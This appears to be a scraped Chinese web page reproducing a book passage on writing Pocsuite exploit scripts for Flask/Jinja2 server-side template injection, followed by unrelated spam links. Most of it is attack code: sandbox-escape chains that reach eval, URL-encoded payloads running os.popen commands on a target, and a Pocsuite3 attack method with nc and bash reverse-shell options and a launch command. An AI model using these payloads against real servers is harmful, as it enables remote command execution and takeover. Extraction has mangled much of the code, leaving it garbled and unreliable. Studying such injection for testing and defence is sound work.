当前位置: 首页 > news >正文

网站建设初级教程教你做网站

网站建设初级教程,教你做网站,网址我的上网主页,网站发布信息技巧EXP脚本的编写与POC脚本编写一样#xff0c;只需要修改_attack部分#xff0c;替换成漏洞 利用的脚本即可。要利用Flask漏洞#xff0c;需要用到Python的特性。关于如何在Jinja2模 板中执行Python代码#xff0c;官方给出的方法是在模板环境中注册函数就可以进行调 用。 J…     EXP脚本的编写与POC脚本编写一样只需要修改_attack部分替换成漏洞  利用的脚本即可。要利用Flask漏洞需要用到Python的特性。关于如何在Jinja2模 板中执行Python代码官方给出的方法是在模板环境中注册函数就可以进行调 用。 Jinja2模板访问Python的内置变量并调用时需要用到Python沙盒逃逸方法 具体参数如下所示。 ·__bases__ 以元组返回一个类所直接继承的类。 ·__mro__ 以元组返回继承关系链。 ·__class__ 返回对象所属的类。 ·__globals__ 以dict返回函数所在模块命名空间中的所有变量。 ·__subclasses__ 以列表返回类的子类。 ·_builtins_ 内建函数。 Python中可以直接运行一些函数如int 、list 等这些函数可以在  __builtins__ 中查到。查看的方法是dir__builtins__ 。利用Python的特性渗透 测试的思路是利用_builtins_ 的特性得到eval 如下所示   for c in () .__class   .   base__[0] .__subclass__() : if c .__name__ _IterationGuard  : c .__init   .   globals__[ __builtins__ ][ eval ](__import__( os ) .system ( whoami )) 再将其转为Jinja2语法格式。Jinja2的语法与Python语法相似但在每个语句 的开始和结束处需要使用{{%%}}括起来转化后的代码如下所示   {%%20for%20c%20in%20[] .__class   .   base   .   subclass__()%20%}%20{%  \ %20if%20c .__name__%27_IterationGuard%27%20%}%20{{%20c .__init   .   globals__[%27__ builtins__%27]  \ [%27eval%27](__import__(%27os%27) .popen(%27whoami%27 .read())%20%%}%20{%%20end- if%20%}%20{%  \ %20endfor%20%} 最后将此EXP写到_attack方法中便完成了EXP的编写如下所示     def __attack(self) :   attack mode    result  {} path  /?name url  self.url  path payload  {%%20for%20c%20in%20[] .__class   .   base   .   subclass__()%20 %}%20{%  \ %20if%20c .__name__%27_IterationGuard%27%20%}%20{{%20c .__init   .   globals__[%27__ builtins__%27]  \ [%27eval%27](__import__(%27os%27) .popen(%27whoami%27 .read())%20%%}%20{%%20end- if%20%}%20{%  \ %20endfor%20%}  try: resq  requests .get(url  payload) if resq and resq .status_code  200 and www in resq .text : result[ VerifyInfo ]  {} result[ VerifyInfo ][ URL ]  url result[ VerifyInfo ][ Name ]  payload except Exception,e: pass return self.parse_output(result) 如此便完成了Pocsuite的POC和EXP编写程序运行结果如图3-4所示。 图3-4    Pocsuite利用脚本 利用Pocsuite 3开源框架可以接收用户输入的命令行参数对目标系统进行 半交互控制具体实现过程如下所示。 首先根据官方文档说明编写一个接收自定义命令的函数将接收到的命 令赋值给command参数。 def _options(self) : o  OrderedDic t() payload  { nc : REVERSE_PAYLOAD .NC, bash : REVERSE_PAYLOAD .BASH, } o[command] OptDic t(selectedbash, defaultpayload) return o 接下来创造一个cmd变量用于接收用户输入的command命令参数并嵌  入payload字符串中。将写好的payload与url地址拼接并通过request函数发送到目 标系统这样就能够在目标系统中执行命令了。最后将命令执行结果输出。代 码如下所示   def _attack(self) : result  {} path  ?name url  self.url  path #print(url) cmd  self.get_option(command) payload  %7B%25%20for%20c%20in%20%5B%5D .__class   .   base   .    subclasses__() \ %20%25%7D%0A%7B%25%20if%20c .__name__%20%3D%3D%20%27catch_warnings% 27%20%25%7D%0A%20%20%7B%25%20 \ for%20b%20in%20c .__init   .   globals__ .values()%20%25%7D%0A%20%20%7B %25%20if%20b.__class__ \ %20%3D%3D%20%7B%7D .__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20 %27eval%27%20in%20b.keys() \ %20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__ (os) .popen( cmd ) .read()%27) \ %20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif %20%25%7D%0A%20%20%7B%25%20endfor \ %20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D  try: resq  requests .get(url  payload) t  resq .text t  t.replace( \n ,  ) .replace( \r ,  ) print(t) t  t.replace( ,) result[ VerifyInfo ]  {} result[ VerifyInfo ][ URL ]  url result[ VerifyInfo ][ Name ]  t except Exception as e: return 执行命令pocsuite-r 1.py-uhttp://x.x.x.x:8000/--attack--commandid 最终效果如 图3-5所示。 图3-5    执行EXP攻击 Flask漏洞主要利用了框架的特点在Flask中“ {{}}” 中的内容会被当作代码 执行相应的防御中就需要对“ {{}}”进行过滤禁止此符号传入参数中。
http://www.pierceye.com/news/22047/

相关文章:

  • 安康电商网站建设做鼻翼整形整形的网站
  • 单页销售网站源码有谁做彩票网站
  • 阿里云 一键wordpress哈尔滨排名seo公司
  • 公司网站后台维护怎么做网站建设哪家好 上海
  • 快速建立平台网站开发网站模板设计网页seo技术
  • 建立网站最先进的互联网技术有哪些常州网站制作培训
  • 全国免费自学网站wordpress php转html
  • 物流网站免费源码杭州哪家网站建设公司好点
  • 什么是网站开发流程17.zwd一起做网站池尾站
  • 岳阳网站建设设计博客型网站建设
  • 怎么创建网站?最好的免费网站空间
  • 怎么利用网站赚广告费WordPress连接不上FTP
  • 网站空间不足深圳市区是哪个区
  • 珠海网站建设怎么样各省网站备案条件
  • 在深圳做网站平台需要什么备案手机浏览器下载app
  • 网站建设和app制作数据平台
  • 北京网站搜索优化网页seo技术
  • 汽车案例网站wordpress for sae 主题
  • 在南宁做家教兼职的网站wordpress页面属性全
  • 怎么做网页超链接青岛seo霸屏
  • 乐从狮山网站建设asp做一个简单网站
  • 用的最多的设计网站是哪个光遇网页制作素材
  • 成都易站网站建设哪些网站是用vue做的
  • 蒙古文网站建设工作计划国外二级域名免费申请
  • 虚拟主机网站500错误自己做网站怎么挣钱
  • 图书网站建设装饰设计公司网站
  • 电商行业建设网站怎么做盗版视频网站
  • 如何制作自己的网站和app广州网络科技有限公司
  • 可以做推文的网站餐饮品牌网站建设
  • WordPress弊端优化大师官方网站